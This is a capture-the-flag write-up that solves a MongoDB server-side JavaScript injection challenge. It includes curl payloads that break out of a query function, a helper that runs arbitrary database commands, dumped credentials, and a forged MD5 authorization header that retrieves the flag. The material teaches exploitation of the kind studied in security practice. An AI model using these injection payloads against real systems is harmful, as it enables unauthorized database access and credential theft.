Tags: nosqli mongodb web
Rating: 5.0
The web page states that the auther is going to learn JS & SQL. So let's focus on the JS:
```
$(document).ready(function() {
$("img").each(function() {
var t = $(this),
i = t.attr("id");
$.get("/get/image/" + i, function(i) {
t.attr("src", i)
})
}), $("p").each(function() {
var t = $(this),
i = t.attr("id");
$.get("/get/text/" + i, function(i) {
t.html(i)
})
});
var j = '/admin_area';
$("h2").each(function() {
var t = $(this),
i = t.attr("id");
$.get("/get/title/" + i, function(i) {
t.html(i)
})
})
});
```
There are 3 types of xhr:
* /get/image/[id]
* /get/text/[id]
* /get/image/[id]
and one url:
* /admin_area
First try to exploit 3 xhr:
> $ curl "http://206.189.54.119:5000/get/image/'"
>
> Not Found
>
> $ curl "http://206.189.54.119:5000/get/text/'"
>
> Not Found.
>
> $ curl "http://206.189.54.119:5000/get/title/'"
>
> Not Found.
Not exploitable? Take a closer look?
> $ curl -v "http://206.189.54.119:5000/get/image/'"
>
> < Application-Error: exception: SyntaxError: Unexpected token ILLEGAL
>
> Not Found
Try something else:
> $ curl -v "http://206.189.54.119:5000/get/image/xxx"
>
> < Application-Error: exception: ReferenceError: xxx is not defined near 'x});return res;'
>
> Not Found
See the code? Try it: (%2F%2F to comment out the rest, escaping %20/%2F to make it match the route)
> $ curl -v -g "http://206.189.54.119:5000/get/image/1});return%20res;%2F%2F"
>
> < Application-Error: exception: SyntaxError: Unexpected end of input
>
> Not Found
Something missing? maybe end of block/function?
> $ curl -v -g "http://206.189.54.119:5000/get/image/1});return%20res;}%2F%2F"
>
> /images/sd4x_378x225.jpg
OK. worked! Now inject something to return:
> $ curl -v -g "http://206.189.54.119:5000/get/image/1});return{1:1};}%2F%2F"
>
> < Application-Error: Couln't find "picture_path" property in returning object from database.
>
> Not Found
Change the key:
> $ curl -v -g "http://206.189.54.119:5000/get/image/1});return{'picture_path':'hello'};}%2F%2F"
>
> hello
Injection suceed! Now we have the injection point:
```
inject()
{
curl -g "http://206.189.54.119:5000/get/image/1});return{'picture_path':tojson($1)}}%2F%2F"
}
inject(this)
```
and got some code piece:
```
...
this._db = db;
...
"_mongo" : connection to EMBEDDED,
"db" : personal_site,
...
```
The site uses mongodb, and we have access to db.
```
inject 'db.getCollectionNames()'
```
> [
> "authentication",
> "contents",
> "credentials",
> "images",
> "system.indexes",
> "titles"
> ]
```
inject 'db.authentication.find({}).toArray()'
inject 'db.credentials.find({}).toArray()'
```
```
[
{
"_id" : ObjectId("5ae63ae0a86f623c83fecfb3"),
"id" : 1,
"method" : "post_data",
"format" : "username=[username]&password=[password]",
"activate" : "false"
},
{
"_id" : ObjectId("5ae63ae0a86f623c83fecfb4"),
"id" : 2,
"method" : "header",
"format" : "md5(se3cr3t|[username]|[password])",
"activate" : "true"
},
{
"_id" : ObjectId("5ae66f87dbf0b5383518fc3d"),
"id" : 50,
"activate" : false
}
][
{
"_id" : ObjectId("5ae63ae0a86f623c83fecfb1"),
"id" : 1,
"username" : "administrator",
"password" : "H4rdP@ssw0rd?"
},
{
"_id" : ObjectId("5ae63ae0a86f623c83fecfb2"),
"id" : 2,
"username" : "user",
"password" : "epass"
}
]
```
Now we have the authentication method and credentials, we can try accessing /admin_area
> $ curl "http://206.189.54.119:5000/admin_area"
>
> authorization_token not found
From above, the only activated authentication method is via header, with format "md5(se3cr3t|[username]|[password])"
> curl "http://206.189.54.119:5000/admin_area" -H "authorization_token: 2cc348195dc1ab9842f9446b41ef650b"
>
> ASIS{3c266f6ccdaaef52eb4a9ab3abc2ca70}